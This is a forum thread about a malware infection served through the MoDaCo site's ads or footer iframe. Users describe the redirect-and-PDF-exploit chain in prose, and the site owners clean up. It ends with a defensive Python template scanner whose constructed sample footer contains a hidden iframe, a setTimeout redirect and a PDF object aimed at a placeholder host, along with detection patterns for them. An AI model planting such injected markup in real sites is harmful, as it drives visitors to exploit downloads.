Adware / spyware in MoDaCo ads?

12 replies to this topic
#1
Mysterious Stranger

    Addict

  • Members
  • 776 posts
  • Devices:Acer dual sim thingy..
See screendump. Wasn't logged in at the time. The syntax struck me as odd. Upon clicking 'no' it tried downloading anyway, but my firewall stopped it....

IE6, fully patched, doing a full scan just in case :-(

Nowhere's safe on the t'interweb eh?

M.S


#2
Mysterious Stranger

    Addict

  • Members
  • 776 posts
  • Devices:Acer dual sim thingy..
More info:

The setTimeout function tells the browser to run the function ‘vparivatel’ in 60 seconds. This function will then redirect the browser to the page vparivatel.php on the same website. This then asks the user to download the file 1.exe.

This adds an element to the current page containing a pdf object. The pdf file that is loaded by this object attempts to exploit a vulnerability in Adobe Acrobat and Acrobat reader. This vulnerability affects versions prior to 8.1.2. If the exploit is successful it will download and execute the 1.exe file without requiring any interaction from the user.

The 1.exe file downloads and installs the rogue antivirus program Spyware Guard 2008. This program pretends to scan the system and falsely reports that the system is infected. In order to remove these ‘threats’ the user must pay for the full version. One clue for the user that this is not legitimate security software is the misspelling of 'security' in the tab on the left hand side.


#3
TheDrizzle

    Enthusiast

  • Members
  • 235 posts
Yeah, my AVG is going nuts each time I visit the forum. It is saying "Exploit Link to known exploit site (type 502)" each time I view any MoDaCo page.... is this a false positive or is there something here?

EDIT:
Just saw your second post. I did notice it asked me to download a PDF! Luckily I use FoxIt, not Adobe Reader, so hopefully I'm ok.

Gonna do a MalwareBytes scan just in case.

Thanks!

Edited by TheDrizzle, 21 February 2009 - 11:32 PM.


#4
PaulOBrien

    It's My Party

  • Founder
  • 36,345 posts
  • Gender:Male
  • Location:Norwich, UK
  • Devices:All the Nexus!
  • Twitter:@paulobrien
Investigating...

P


You can follow me on Twitter - http://twitter.com/paulobrien / Follow MoDaCo on Twitter - http://twitter.com/modaco

Want to donate? MoDaCo is raising money for the Multiple Sclerosis society.

#5
PaulOBrien

    It's My Party

  • Founder
  • 36,345 posts
  • Gender:Male
  • Location:Norwich, UK
  • Devices:All the Nexus!
  • Twitter:@paulobrien
Should be gone now, continuing diagnosis...

P


#6
awarner

    Staff Team Leader

  • Admin Team
  • 18,506 posts
  • Gender:Male
  • Location:Southampton
  • Interests:Life the universe and everything in it :) Lumia 925 one hell of a camera phone
  • Devices:Lumia 925 a real phone at last
  • Twitter:@ashwarner
On the lappy, Kaspersky found it as soon as I clicked on the site :(

Windows Onecare did not even flinch and let the little beastie screw up my main PC.

Twitter me @ashwarner

Windows Phone 7 Expert.
Windows Phone Business Specialist



#7
Mysterious Stranger

    Addict

  • Members
  • 776 posts
  • Devices:Acer dual sim thingy..

Windows Onecare did not even flinch and let the little beastie screw up my main PC.


Should only be an issue if you allow the re-direct and file install by clicking on it, although *any* action in the dialogue box (even clicking 'no') prompts for the download. I'd suggest you reset your browser security settings to default? My laptop has a corporate Norton on there, but I use Onecare on another machine and it's usually very good.

M.S


#8
awarner

    Staff Team Leader

  • Admin Team
  • 18,506 posts
  • Gender:Male
  • Location:Southampton
  • Interests:Life the universe and everything in it :) Lumia 925 one hell of a camera phone
  • Devices:Lumia 925 a real phone at last
  • Twitter:@ashwarner
Did not get that far, the whole hard drive went into overtime and the PC went as fast as an Orange ROM :(

Using FF, and all security settings will be the default as I generally do not touch them; the same applies to Onecare.
I've found Onecare to be good in the past, but then again after this just how good has it really been?
Some guys I know in the security business will only touch Kaspersky, but as they say most threats will technically get through until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...




#9
Mysterious Stranger

    Addict

  • Members
  • 776 posts
  • Devices:Acer dual sim thingy..

Did not get that far, the whole hard drive went into overtime and the PC went as fast as an Orange ROM :(

Using FF, and all security settings will be the default as I generally do not touch them; the same applies to Onecare.
I've found Onecare to be good in the past, but then again after this just how good has it really been?
Some guys I know in the security business will only touch Kaspersky, but as they say most threats will technically get through until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...


Check the pop-up blocker settings in Firefox.

http://support.mozil.../Pop-up blocker

There are options to handle different file types differently. As this exploit uses a .pdf file it may be you have settings that allow downloads of PDFs (which are usually safe and inert....)

Also, from older posts on t'interweb (June 08), Firefox automatically downloads stuff into a cache:

http://alanedwardes....-security-flaw/

"WTF? So does Firefox download stuff for you now? So it turns out it does. When I looked in the OneCare quarantine it displayed the path that the virus was found in. So, I was a bit worried when it turned out that the file was found in the Firefox cache folder. Interesting."

Which version of Firefox is it? There are/were multiple mutterings about incompatibility with Onecare for older versions. As Onecare has now been discontinued (as some aspects are going to be incorporated in future free offerings from M$) I wouldn't expect too much development with the latest version of Firefox etc. Shame, as some of the advanced functions with Onecare are very good.

I've always given Kaspersky a bit of a wide berth based on F-Secure using their engine and being so poor at doing pretty much anything. Everyone has their own favourite, and there will be fans and haters of every solution. Norton's 2009 suite has been re-written to improve system performance and is supposedly quite good now.

Kaspersky also uninstalls the very good, free Spybot S&D for no real reason...

http://forum.kaspers...mp;#entry768506

M.S


#10
Mysterious Stranger

    Addict

  • Members
  • 776 posts
  • Devices:Acer dual sim thingy..

Should be gone now, continuing diagnosis...

P


Still doing it - look at the URL it's trying to open, same as the last one; crashed my browser window this time though. :(

More diagnosis needed methinks?

M.S


#11
Monolithix

    Hardcore

  • MoDaCo Gold
  • 8,783 posts
OK, looks like the owner of caribfinancing has found out about their security issue and is now redirecting calls to that page to Google... which means, due to the iframe remaining on every page footer, every MoDaCo page is being redirected to Google! (unless you hit stop in time...).

Virus issue appears to have been resolved, but obviously the site just needs tweaking back; watch this space...


I still exist


#12
PaulOBrien

    It's My Party

  • Founder
  • 36,345 posts
  • Gender:Male
  • Location:Norwich, UK
  • Devices:All the Nexus!
  • Twitter:@paulobrien
Should be all sorted now, nasty hackers... :(

P


#13
markmcfc

    Newbie

  • Members
  • 1 posts
Hi there, I have this same problem on my site. I've deleted it many times from skins, but it keeps coming back. Please can you tell me how to get rid of it altogether?

Many thanks

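Posts #2, #11 and #13 describe the same pattern from three angles: a script that uses setTimeout to redirect to a .php page after 60 seconds, a PDF object dropped into the page, and an iframe that lives in a footer template so it comes back on every page. The scanner below is an added example for site owners who want to find that kind of injected markup in their own templates; it is not MoDaCo's code and not the code from the thread. It is regex-based triage, not a full HTML parser, and the host name and file names in the constructed sample are placeholders, not indicators from the thread.

```python
"""Scan site templates for injected markup of the kind described in this thread:
hidden iframes (often in the footer), setTimeout-driven redirects, and embedded
PDF objects.  Added example; regex-based, so treat hits as things to inspect."""
import re
from pathlib import Path

# Deliberately broad patterns: a hit means "look at this", not "infected".
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*[\"']?\s*[01]\b"          # 0/1-pixel frames
    r"|visibility\s*:\s*hidden|display\s*:\s*none"     # CSS-hidden frames
    r"|position\s*:\s*absolute[^\"']*(?:left|top)\s*:\s*-\d+",  # pushed off-screen
    re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
TIMER_RE = re.compile(r"setTimeout\s*\(\s*[\"']?(\w+)", re.I)
REDIRECT_RE = re.compile(r"(?:window|document|self|top)\.location(?:\.href)?\s*=", re.I)
PDF_RE = re.compile(r"<(?:object|embed)\b[^>]*(?:application/pdf|\.pdf\b)", re.I)


def scan_html(html, allowed_hosts=()):
    """Return a list of (finding, snippet) pairs for one HTML/template string.

    allowed_hosts: hostnames your own templates legitimately load in iframes
    (anything else is reported, hidden or not)."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        host = re.sub(r"^\w+://", "", src.group(1)).split("/")[0].lower() if src else ""
        hidden = bool(HIDDEN_RE.search(tag))
        if host and host not in allowed_hosts:
            findings.append(("iframe to unexpected host" + (" (hidden)" if hidden else ""), tag))
        elif hidden:
            findings.append(("hidden iframe", tag))
    for m in TIMER_RE.finditer(html):
        fn = m.group(1)
        # Find the named function's body and check whether it assigns location.
        # Non-greedy brace match: good enough for the one-line redirect stubs
        # seen in injections, not for nested functions.
        body = re.search(r"function\s+" + re.escape(fn) + r"\s*\([^)]*\)\s*\{(.*?)\}", html, re.S)
        if body and REDIRECT_RE.search(body.group(1)):
            findings.append(("timed redirect via " + fn, m.group(0)))
    for m in PDF_RE.finditer(html):
        findings.append(("embedded PDF object", m.group(0)))
    return findings


def scan_tree(root, allowed_hosts=(), suffixes=(".html", ".htm", ".php", ".tpl")):
    """Walk a template/skin directory and map each file with findings to its list."""
    results = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            hits = scan_html(p.read_text(errors="replace"), allowed_hosts)
            if hits:
                results[str(p)] = hits
    return results


# Constructed sample: a footer template carrying the three tell-tales from the
# thread.  The host is a placeholder (.invalid TLD), not a real indicator.
SAMPLE_FOOTER = """
<div id="footer">&copy; Example Forum</div>
<iframe src="http://bad.example.invalid/vparivatel.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<script>
function vparivatel() { window.location = "vparivatel.php"; }
setTimeout("vparivatel()", 60000);
</script>
<object data="http://bad.example.invalid/x.pdf" type="application/pdf"></object>
"""

# Constructed clean footer: a visible embed from a host the site owner expects.
CLEAN_FOOTER = '<div id="footer">&copy; Example Forum</div>' \
               '<iframe src="https://www.youtube.com/embed/abc"></iframe>'

if __name__ == "__main__":
    for kind, snippet in scan_html(SAMPLE_FOOTER):
        print(f"[{kind}] {snippet.strip()[:80]}")
    # To check a real skin directory: scan_tree("/path/to/skins", allowed_hosts=("www.youtube.com",))
```

Run it against a copy of the skin or template directory rather than the live document root; if the injected footer keeps coming back after you clean it, the scanner only tells you where it is, and the thread's point is that the source of the reinfection (the compromised upload path or account) still has to be closed.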